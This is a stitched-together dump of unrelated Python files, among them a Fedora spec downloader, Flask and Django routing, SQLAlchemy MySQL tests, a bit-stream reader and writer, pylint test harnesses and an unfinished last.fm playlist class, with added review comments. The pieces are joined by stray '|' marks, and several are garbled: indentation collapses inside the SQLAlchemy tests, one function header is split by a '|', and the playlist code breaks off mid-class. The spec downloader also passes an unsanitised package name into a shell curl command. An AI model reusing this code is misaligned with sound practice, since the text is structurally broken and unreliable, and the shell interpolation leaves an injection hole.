# [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name
# from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast)
# [ ] - all provides of source code import must in a form golang(import_path/...)
# [ ] - what files/provides are optional, which should not be in provides (test files, example, ...)
# [ ] - golang imports of examples are optional
###################################################################
import tempfile
from Utils import runCommand
from SpecParser import SpecParser
from Base import Base
class RemoteSpecParser(Base):
    """Download a package's spec file from Fedora dist-git and parse it."""

    def __init__(self, branch, package):
        Base.__init__(self)
        self.branch = branch
        self.package = package
        self.sp_obj = None

    def parse(self):
        """Fetch the spec file and parse it.

        Returns True on success; on failure stores the parser error in
        self.err and returns False.
        """
        f = tempfile.NamedTemporaryFile(delete=True)
        try:
            # NOTE(review): the package name is interpolated into a shell
            # command line; callers must ensure it is a trusted value.
            cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s"
            runCommand(cmd_str % (self.package, self.package, f.name))
            self.sp_obj = SpecParser(f.name)
            if not self.sp_obj.parse():
                self.err = self.sp_obj.getError()
                return False
            return True
        finally:
            # Fix: close in a finally block so the temporary file is
            # removed (delete=True) even when parsing raises.
            f.close()

    def getProvides(self):
        """Fetch a spec file from pkgdb and get provides from all its [sub]packages"""
        # Fix: compare to None with `is`, not `==`.
        if self.sp_obj is None:
            return {}
        return self.sp_obj.getProvides()

    def getPackageCommits(self):
        """Return the 'commit' macro from the parsed spec, or ''."""
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getMacro("commit")

    def getPkgURL(self):
        """Return the 'url' tag from the parsed spec, or ''."""
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getTag("url")
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
#
# @author Meng G.
# 2016-03-28 restructed
from sqip.config import *
from sqip.libs import *
# NOTE(review): this blueprint appears unused -- the view decorators below
# register on `base`, not `dashboard`; confirm which should own the routes.
dashboard = Blueprint('dashboard', __name__, template_folder='templates')
@base.route('/admin/login', methods=['GET'])
@union_bug
def admin_login():
    """Render the admin login page."""
    return env.get_template('login.html').render()
@base.route('/admin' , methods=['GET'])
@base.route('/admin/<path:path>' , methods=['GET'])
@union_bug
def admin():
    """Render the admin shell page for /admin and any sub-path.

    Bug fix: the rule previously read ``<oath:path>`` — 'oath' is not a
    built-in Werkzeug converter (valid ones: string, int, float, path,
    uuid, any), so registering the route would fail unless a custom
    'oath' converter had been registered elsewhere.  ``<path:path>``
    matches any sub-path, the usual catch-all for a client-routed UI.
    """
    template = env.get_template('index.html')
    return template.render()
#coding=utf-8
class Quantity:
    """Descriptor that only accepts values > 0.

    Each descriptor instance manages one attribute.  Values are stored in
    the owner *instance's* __dict__ under a unique per-descriptor key so
    multiple Quantity descriptors on one class never collide.
    """
    __counter = 0  # class-wide count of Quantity instances, for unique names

    def __init__(self):
        cls = self.__class__
        prefix = cls.__name__
        index = cls.__counter
        # e.g. '_Quantity#0' — '#' keeps it out of the identifier namespace
        self.storage_name = '_{}#{}'.format(prefix, index)
        cls.__counter += 1

    def __get__(self, instance, owner):
        """Return the stored value (added fix).

        Without __get__, reading the managed attribute returned the
        descriptor object itself (storage_name differs from the attribute
        name), which broke e.g. LineItem.subtotal().
        """
        if instance is None:
            # Accessed on the class, not an instance: return the descriptor.
            return self
        return instance.__dict__[self.storage_name]

    def __set__(self, instance, value):
        # Parameter renamed: it previously shadowed the builtin isinstance().
        if value > 0:
            instance.__dict__[self.storage_name] = value
        else:
            raise ValueError('value must be > 0')
class LineItem:
    """An order line: a description plus weight and price, both validated
    by the Quantity descriptor (must be > 0)."""
    weight = Quantity()
    price = Quantity()

    def __init__(self, description, weight, price):
        self.description = description
        self.weight = weight
        self.price = price

    def subtotal(self):
        """Total cost of this line (weight times unit price)."""
        return self.weight * self.price
|
"key": "/key.pem",
},
"host": "localhost",
"user": "scott",
"port": 3306,
},
)
    # Each (kwarg, value) pair runs as its own test case.
    @testing.combinations(
        ("compress", True),
        ("connect_timeout", 30),
        ("read_timeout", 30),
        ("write_timeout", 30),
        ("client_flag", 1234),
        ("local_infile", 1234),
        ("use_unicode", False),
        ("charset", "hello"),
    )
    def test_normal_arguments_mysqldb(self, kwarg, value):
        """URL query-string args known to mysqldb are coerced to their
        typed values and forwarded into the DBAPI connect kwargs."""
        from sqlalchemy.dialects.mysql import mysqldb
        dialect = mysqldb.dialect()
        connect_args = dialect.create_connect_args(
            make_url(
                "mysql://scott:tiger@localhost:3306/test"
                "?%s=%s" % (kwarg, value)
            )
        )
        # create_connect_args() returns (args, kwargs); the kwarg must
        # arrive with its typed value, not the raw query string.
        eq_(connect_args[1][kwarg], value)
def test_mysqlconnector_buffered_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=true")
)[1]
eq_(kw["buffered"], True)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db?buffered=false")
)[1]
eq_(kw["buffered"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
eq_(kw["buffered"], True)
def test_mysqlconnector_raise_on_warnings_arg(self):
from sqlalchemy.dialects.mysql import mysqlconnector
dialect = mysqlconnector.dialect()
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true"
)
)[1]
eq_(kw["raise_on_warnings"], True)
kw = dialect.create_connect_args(
make_url(
"mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false"
)
)[1]
eq_(kw["raise_on_warnings"], False)
kw = dialect.create_connect_args(
make_url("mysql+mysqlconnector://u:p@host/db")
)[1]
assert "raise_on_warnings" not in kw
@testing.only_on("mysql")
def test_random_arg(self):
dialect = testing.db.dialect
kw = dialect.create_connect_args(
make_url("mysql://u:p@host/db?foo=true")
)[1]
eq_(kw["foo"], "true")
    @testing.only_on("mysql")
    @testing.skip_if("mysql+mysqlconnector", "totally broken for the moment")
    @testing.fails_on("mysql+oursql", "unsupported")
    def test_special_encodings(self):
        """The dialect should report back exactly the charset handed to the
        driver, for both utf8 and utf8mb4."""
        for enc in ["utf8mb4", "utf8"]:
            eng = engines.testing_engine(
                options={"connect_args": {"charset": enc, "use_unicode": 0}}
            )
            # NOTE(review): connection/engine are never closed here; this
            # relies on test-framework teardown to dispose them.
            conn = eng.connect()
            eq_(conn.dialect._connection_charset, enc)
    def test_no_show_variables(self):
        """A warning — not a failure — is emitted when the MySQL user lacks
        permission to run SHOW VARIABLES during dialect initialization."""
        from sqlalchemy.testing import mock
        engine = engines.testing_engine()
        def my_execute(self, statement, *args, **kw):
            # Simulate a restricted user: make SHOW VARIABLES return no rows.
            if statement.startswith("SHOW VARIABLES"):
                statement = "SELECT 1 FROM DUAL WHERE 1=0"
            return real_exec(self, statement, *args, **kw)
        # Captured after definition but before the patch, so my_execute can
        # delegate to the unpatched implementation.
        real_exec = engine._connection_cls.exec_driver_sql
        with mock.patch.object(
            engine._connection_cls, "exec_driver_sql", my_execute
        ):
            with expect_warnings(
                "Could not retrieve SQL_MODE; please ensure the "
                "MySQL user has permissions to SHOW VARIABLES"
            ):
                engine.connect()
def | test_no_default_isolation_level(self):
from sqlalchemy.testing import mock
engine = engines.testing_engine()
real_isolation_level = testing.db.dialect.get_isolation_level
def fake_isolation_level(connection):
connection = mock.Mock(
cursor=mock.Mock(
return_value=mock.Mock(
fetchone=mock.Mock(return_value=None)
)
)
)
return real_isolation_level(connection)
with mock.patch.object(
engine.dialect, "get_isolation_level", fake_isolation_level
):
with expect_warnings(
"Could not retrieve transaction isolation level for MySQL "
"connection."
):
engine.connect()
    def test_autocommit_isolation_level(self):
        """AUTOCOMMIT should turn the session @@autocommit flag on, and
        switching to a real isolation level should turn it back off."""
        c = testing.db.connect().execution_options(
            isolation_level="AUTOCOMMIT"
        )
        assert c.exec_driver_sql("SELECT @@autocommit;").scalar()
        # Re-option the same connection back to a standard level.
        c = c.execution_options(isolation_level="READ COMMITTED")
        assert not c.exec_driver_sql("SELECT @@autocommit;").scalar()
def test_isolation_level(self):
values = [
"READ UNCOMMITTED",
"READ COMMITTED",
"REPEATABLE READ",
"SERIALIZABLE",
]
for value in values:
c = testing.db.connect().execution_options(isolation_level=value)
eq_(testing.db.dialect.get_isolation_level(c.connection), value)
class ParseVersionTest(fixtures.TestBase):
    """Unit tests for server version-string parsing and MariaDB detection."""
    # Tuples are (expected_normalized, raw_version_string, parsed_tuple,
    # is_mariadb).
    @testing.combinations(
        ((10, 2, 7), "10.2.7-MariaDB", (10, 2, 7, "MariaDB"), True),
        (
            (10, 2, 7),
            "5.6.15.10.2.7-MariaDB",
            (5, 6, 15, 10, 2, 7, "MariaDB"),
            True,
        ),
        ((10, 2, 10), "10.2.10-MariaDB", (10, 2, 10, "MariaDB"), True),
        ((5, 7, 20), "5.7.20", (5, 7, 20), False),
        ((5, 6, 15), "5.6.15", (5, 6, 15), False),
        (
            (10, 2, 6),
            "10.2.6.MariaDB.10.2.6+maria~stretch-log",
            (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log"),
            True,
        ),
        (
            (10, 1, 9),
            "10.1.9-MariaDBV1.0R050D002-20170809-1522",
            (10, 1, 9, "MariaDB", "V1", "0R050D002", 20170809, 1522),
            True,
        ),
    )
    def test_mariadb_normalized_version(
        self, expected, raw_version, version, is_mariadb
    ):
        dialect = mysql.dialect()
        # raw string -> parsed tuple
        eq_(dialect._parse_server_version(raw_version), version)
        # parsed tuple -> normalized (major, minor, patch) plus MariaDB flag
        dialect.server_version_info = version
        eq_(dialect._mariadb_normalized_version_info, expected)
        assert dialect._is_mariadb is is_mariadb
    # Tuples are (warning_expected, server_version_info); MariaDB < 10.2.9
    # should trigger the CHECK-constraint warning.
    @testing.combinations(
        (True, (10, 2, 7, "MariaDB")),
        (True, (5, 6, 15, 10, 2, 7, "MariaDB")),
        (False, (10, 2, 10, "MariaDB")),
        (False, (5, 7, 20)),
        (False, (5, 6, 15)),
        (True, (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log")),
    )
    def test_mariadb_check_warning(self, expect_, version):
        dialect = mysql.dialect()
        dialect.server_version_info = version
        if expect_:
            with expect_warnings(
                ".*before 10.2.9 has known issues regarding "
                "CHECK constraints"
            ):
                dialect._warn_for_known_db_issues()
        else:
            # No warning expected: the call must simply pass silently.
            dialect._warn_for_known_db_issues()
class RemoveUTCTimestampTest(fixtures.TablesTest):
"""This test exists because we removed the MySQL dialect's
override of the UTC_TIMESTAMP() function, where the commit message
for this feature stated that "it caused problems with executemany()".
Since no example was provided, we are trying lots of combinations
here.
[ticket:3966]
"""
__only_on__ = "mysql"
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"t",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("data", DateTime),
)
Table(
"t_default",
metadata,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("idata", DateTime, default=func.utc_timestamp()),
Column("udata", DateTime, onupdate=func.utc_timestamp()),
)
def test_insert_executemany(self):
with testing.db.connect() as conn:
|
# @source http://rosettacode.org/wiki/Bitwise_IO#Python
# @license http://www.gnu.org/licenses/fdl-1.2.html
import logging
logger = logging.getLogger('naabal.util.bitio')
class BitIO(object):
    """Base class for bit-oriented wrappers around a byte stream.

    Keeps a one-byte staging buffer, a single-bit mask that walks from the
    most-significant bit down to the least, and a count of whole bytes
    processed so far.
    """
    BITS_IN_BYTE = 8
    DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1)  # 0x80: MSB-first bit order

    def __init__(self, handle):
        self._data_buffer = handle            # underlying byte stream
        self._bit_buffer = 0x00               # partial byte being staged
        self._bit_mask = self.DEFAULT_MASK    # position of the next bit
        self._bit_idx = 0                     # whole bytes read/written

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        # Base class has nothing to release; subclasses override.
        pass

    @property
    def index(self):
        """Number of whole bytes that have passed through the stream."""
        return self._bit_idx
class BitWriter(BitIO):
    """Writes individual bits MSB-first, emitting each completed byte."""

    def __exit__(self, type, value, tb):
        # Make sure a trailing partial byte reaches the stream.
        self.flush()

    def write_bit(self, bit):
        """Append one bit; any truthy value counts as 1."""
        if bit:
            self._bit_buffer |= self._bit_mask
        self._bit_mask >>= 1
        if not self._bit_mask:
            # A full byte has been staged: push it out and start over.
            self._flush_bit_buffer()
            self._reset_state()

    def write_bits(self, value, bit_count):
        """Append the low *bit_count* bits of *value*, MSB first."""
        for shift in range(bit_count - 1, -1, -1):
            self.write_bit((value >> shift) & 1)

    def flush(self):
        """Emit any buffered partial byte; return bytes written so far."""
        if self._bit_mask != self.DEFAULT_MASK:
            self._flush_bit_buffer()
            self._reset_state()
        return self._bit_idx

    def _flush_bit_buffer(self):
        # chr() keeps the Python 2 byte-string semantics this module uses.
        self._data_buffer.write(chr(self._bit_buffer))
        self._bit_idx += 1

    def _reset_state(self):
        self._bit_buffer = 0x00
        self._bit_mask = self.DEFAULT_MASK
class BitReader(BitIO):
    """Reads bits MSB-first, pulling bytes from the stream on demand."""
    def read_bit(self):
        """Return the next bit as 0 or 1; raises IOError at EOF."""
        # A mask back at its starting position means the staged byte is
        # exhausted (or was never loaded) -- fetch the next byte.
        if self._bit_mask == self.DEFAULT_MASK:
            self._load_bit_buffer()
        value = self._bit_buffer & self._bit_mask
        self._bit_mask = self._bit_mask >> 1
        if self._bit_mask == 0:
            self._bit_mask = self.DEFAULT_MASK
        return 1 if value else 0
    def read_bits(self, bit_count):
        """Return *bit_count* bits as an unsigned integer, MSB first."""
        mask = 1 << (bit_count - 1)
        bits_value = 0x00
        while mask != 0:
            # Refill the staging byte whenever its mask wraps around.
            if self._bit_mask == self.DEFAULT_MASK:
                self._load_bit_buffer()
            if self._bit_buffer & self._bit_mask:
                bits_value |= mask
            mask = mask >> 1
            self._bit_mask = self._bit_mask >> 1
            if self._bit_mask == 0:
                self._bit_mask = self.DEFAULT_MASK
        return bits_value
    def _load_bit_buffer(self):
        """Fetch one byte from the stream into the bit buffer."""
        c = self._data_buffer.read(1)
        if c:
            self._bit_buffer = ord(c)
            self._bit_idx += 1
        else:
            raise IOError('Attempted to read past EOF')
|
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ | -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms | of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""functional/non regression tests for pylint"""
import unittest
import sys
import re
import new
from os import linesep
from os.path import exists
from logilab.common import testlib
from utils import get_tests_info, fix_path, TestReporter
from logilab.astng import MANAGER
from pylint.lint import PyLinter
from pylint import checkers
# Shared linter/reporter fixtures reused by every generated test class below.
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))
# Interpreter feature flags used to select per-version expected outputs.
PY23 = sys.version_info >= (2, 3)
PY24 = sys.version_info >= (2, 4)
PY25 = sys.version_info >= (2, 5)
# Pick a line-ending normalizer once, at import time, based on the platform.
if linesep != '\n':
    LINE_RGX = re.compile(linesep)
    def ulines(string):
        """Normalize platform line separators to '\n'."""
        return LINE_RGX.sub('\n', string)
else:
    def ulines(string):
        """No-op: this platform's linesep is already '\n'."""
        return string
# Matches input modules named func_iNNNN (informational-message tests).
# Raw string added: '\d' in a plain literal only works because Python passes
# unknown escapes through, and is a DeprecationWarning on modern Pythons.
INFO_TEST_RGX = re.compile(r'^func_i\d\d\d\d$')
def exception_str(ex):
    """Replacement __str__ for exceptions that carry a .file attribute,
    showing the checked target followed by the exception arguments."""
    joined_args = ', '.join(ex.args)
    return 'in %s\n:: %s' % (ex.file, joined_args)
class LintTestUsingModule(testlib.TestCase):
    """Run pylint on one input module and compare the emitted messages
    against a recorded expected-output file.  (Python 2 code.)"""
    DEFAULT_PACKAGE = 'input'
    package = DEFAULT_PACKAGE
    linter = linter       # shared module-level PyLinter instance
    module = None         # set by the generated subclasses in make_tests()
    depends = None        # optional [(name, file), ...] dependency modules
    _TEST_TYPE = 'module'
    def shortDescription(self):
        # Human-readable label shown by the test runner.
        values = { 'mode' : self._TEST_TYPE,
                   'input': self.module,
                   'pkg': self.package,
                   'cls': self.__class__.__name__}
        if self.package == self.DEFAULT_PACKAGE:
            msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
        else:
            msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
        return msg % values
    def test_functionality(self):
        # Check the module itself plus any declared dependency modules.
        tocheck = [self.package+'.'+self.module]
        if self.depends:
            tocheck += [self.package+'.%s' % name.replace('.py', '')
                        for name, file in self.depends]
        self._test(tocheck)
    def _test(self, tocheck):
        # Informational (I) messages are only enabled for func_iNNNN inputs.
        if INFO_TEST_RGX.match(self.module):
            self.linter.enable_message_category('I')
        else:
            self.linter.disable_message_category('I')
        try:
            self.linter.check(tocheck)
        except Exception, ex:
            # need finalization to restore a correct state
            self.linter.reporter.finalize()
            ex.file = tocheck
            # Patch __str__ so the failure names the file being checked.
            ex.__str__ = new.instancemethod(exception_str, ex, None)
            raise
        # 'noerror' inputs are expected to produce no messages at all.
        if self.module.startswith('func_noerror_'):
            expected = ''
        else:
            output = open(self.output)
            expected = output.read().strip()
            output.close()
        got = self.linter.reporter.finalize().strip()
        try:
            self.assertLinesEquals(got, expected)
        except Exception, ex:
            # doesn't work with py 2.5
            #ex.file = tocheck
            #ex.__str__ = new.instancemethod(exception_str, ex, None)
            # Re-raise with the module name, preserving the traceback.
            raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1]
class LintTestUsingFile(LintTestUsingModule):
    """Same checks as LintTestUsingModule but pylint is given file paths
    instead of dotted module names."""
    _TEST_TYPE = 'file'
    def test_functionality(self):
        tocheck = [self.package+'/' + self.module + '.py']
        if self.depends:
            tocheck += [self.package+'/%s' % name for name, file in self.depends]
        self._test(tocheck)
class TestTests(testlib.TestCase):
    """check that all testable messages have been checked"""
    @testlib.tag('coverage')
    def test_exhaustivity(self):
        # skip fatal messages
        todo = [msgid for msgid in linter._messages.keys() if msgid[0] != 'F']
        # Remove every message id some input test actually produced; what is
        # left is the set of message ids with no test coverage.
        for msgid in test_reporter.message_ids.keys():
            try:
                todo.remove(msgid)
            except ValueError:
                continue
        todo.sort()
        # Only these known-untestable ids may remain, per Python version.
        if PY25:
            self.assertEqual(todo, ['E0503', 'I0001'])
        elif PY23:
            self.assertEqual(todo, ['E0503', 'I0001'])
        else: # python < 2.3
            self.assertEqual(todo, ['I0001'])
        #bycat = {}
        #for msgid in linter._messages.keys():
        #    bycat[msgid[0]] = bycat.setdefault(msgid[0], 0) + 1
        #for cat, val in bycat.items():
        #    print '%s: %s' % (cat, val)
        #print 'total', sum(bycat.values())
        #
        # on 2007/02/17:
        #
        # W: 48
        # E: 42
        # R: 15
        # C: 13
        # F: 7
        # I: 5
        # total 130
def make_tests(filter_rgx):
    """generate tests classes from test info

    return the list of generated test classes
    """
    if filter_rgx:
        is_to_run = re.compile(filter_rgx).search
    else:
        is_to_run = lambda x: 1
    tests = []
    # 'nonexistant' is deliberately appended to also exercise the behaviour
    # on a module that does not exist.
    for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]:
        # skip those tests with python >= 2.3 since py2.3 detects them by itself
        if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"):
            continue
        # Inputs named *_pyNN.py only run on interpreters >= N.N.
        pyrestr = module_file.rsplit('_py', 1)[-1][:-3]
        if pyrestr.isdigit(): # '24', '25'...
            if sys.version_info < tuple([int(i) for i in pyrestr]):
                continue
        if not is_to_run(module_file):
            continue
        base = module_file.replace('func_', '').replace('.py', '')
        dependencies = get_tests_info(base, '.py')
        # One dynamically-created subclass per input file (module mode).
        class LintTestUsingModuleTC(LintTestUsingModule):
            module = module_file.replace('.py', '')
            output = messages_file
            depends = dependencies or None
            tags = testlib.Tags(('generated','pylint_input_%s' % module))
        tests.append(LintTestUsingModuleTC)
        if MODULES_ONLY:
            continue
        # Same input, checked by file path; a 'messages_file2' variant, when
        # present, overrides the expected output for file mode.
        class LintTestUsingFileTC(LintTestUsingFile):
            module = module_file.replace('.py', '')
            output = exists(messages_file + '2') and (messages_file + '2') or messages_file
            depends = dependencies or None
            tags = testlib.Tags(('generated', 'pylint_input_%s' % module))
        tests.append(LintTestUsingFileTC)
##    # special test for f0003
##    module_file, messages_file in get_tests_info('func_f0003', '.pyc')
##    class LintTestSubclass(LintTest):
##        module = module_file.replace('.pyc', '')
##        output = messages_file
##        depends = dependencies or None
##    tests.append(LintTestSubclass)
    # Also lint a builtin C module (sys) to cover that code path.
    class LintBuiltinModuleTest(LintTestUsingModule):
        output = 'messages/builtin_module.txt'
        module = 'sys'
        def test_functionality(self):
            self._test(['sys'])
    tests.append(LintBuiltinModuleTest)
    if not filter_rgx:
        # test all features are tested :)
        tests.append(TestTests)
    return tests
# Overridden from the command line in the __main__ block below.
FILTER_RGX = None
MODULES_ONLY = False
def suite():
    # Built lazily so FILTER_RGX/MODULES_ONLY set in __main__ take effect.
    return unittest.TestSuite([unittest.makeSuite(test)
                               for test in make_tests(FILTER_RGX)])
if __name__=='__main__':
    # Usage: python <script> [-m] [filter_regex]
    if '-m' in sys.argv:
        MODULES_ONLY = True
        sys.argv.remove('-m')
    if len(sys.argv) > 1:
        FILTER_RGX = sys.argv[1]
        del sys.argv[1]
    testlib.unittest_main(defaultTest='suite')
|
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path
from confla import views
app_name = "confla"
# NOTE: order matters — the generic '^(?P<url_id>\w+)/...' patterns appear
# after the literal prefixes they would otherwise shadow.
urlpatterns = [
    # Site-wide pages, auth and user management
    path('admin/', admin.site.urls),
    url(r'^$', views.IndexView.my_view, name='index'),
    url(r'add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'),
    url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'),
    url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'),
    url(r'^login/$', views.LoginView.my_view, name='login'),
    url(r'^logout/$', views.LoginView.logout, name='logout'),
    url(r'^process/$', views.LoginView.auth_and_login, name='process_login'),
    url(r'^users/$', views.UserView.my_view, name='users'),
    url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'),
    url(r'^user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_email, name='delete_email'),
    url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'),
    url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'),
    url(r'^register/$', views.RegisterView.user_register, name='register'),
    url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'),
    url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'),
    #url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'),
    #url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'),
    url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'),
    # Per-conference public pages (url_id is the conference slug)
    url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'),
    url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'),
    url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'),
    url(r'^(?P<url_id>\w+)/events/$', views.EventView.event_list, name='event_list'),
    url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'),
    url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'),
    url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'),
    url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'),
    url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'),
    url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'),
    url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'),
    url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'),
    url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'),
    url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'),
    url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'),
    # Site-wide organizer/admin pages
    url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'),
    url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'),
    url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'),
    url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'),
    url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'),
    url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'),
    url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'),
    url(r'^org/admin/users/$', views.AdminView.users, name='org_users'),
    url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'),
    url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'),
    # Per-conference admin pages
    url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'),
    url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'),
    url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'),
    url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'),
    url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'),
    url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'),
    url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'),
    url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'),
    url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'),
    url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'),
    url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'),
    url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'),
    url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'),
    url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'),
    url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',views.RegisterView.activate_email , name='activate_email'),
]
# Serve uploaded media in development.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from pprint import pprint
from django.shortcuts import render
def index(request):
    """Render the itat landing page."""
    template_name = 'itat/index.html'
    return render(request, template_name)
| |
# -*- coding: utf-8 -*-
import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp
import unicodedata
import Levenshtein
config = ConfigParser.ConfigParser()
config.read("config.ini")
def clean(chaine):
    """Canonicalize a string: strip surrounding whitespace, lowercase."""
    return chaine.strip().lower()
def decode(chaine):
    """Normalize curly apostrophes, then strip non-ASCII via NFKD.

    Returns an ASCII byte string when normalization succeeds, otherwise
    the (apostrophe-fixed) input unchanged — best-effort by design.
    """
    chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'")
    try:
        chaine = unicodedata.normalize('NFKD', chaine).encode('ascii', 'ignore')
        return chaine
    except Exception:
        # Was a bare except:, which also hid the fact that `unicodedata`
        # was never imported (now imported at module top) and would have
        # swallowed KeyboardInterrupt/SystemExit too.
        return chaine
def remove_accents(input_str):
    """Strip combining accents via NFKD decomposition.

    Falls back to returning the input unchanged on any error (e.g. under
    Python 3, where the ``unicode`` builtin does not exist).
    """
    try:
        nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
        return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
    except Exception:
        # Was a bare except: (would even swallow KeyboardInterrupt).
        return input_str
def cc(i):
    """Canonical comparable form: accents removed, cleaned, ASCII-decoded."""
    unaccented = remove_accents(i)
    return decode(clean(unaccented))
def getKey(item):
    """Sort key: the first element of *item* (a Levenshtein distance)."""
    return item[0]
class playlist:
    """Build an .m3u playlist from the user's last.fm top tracks by matching
    them against a local music directory (exact match, then Levenshtein),
    optionally copying the files to a portable-player directory."""
    def __init__(self, limit, page=1, period="overall"):
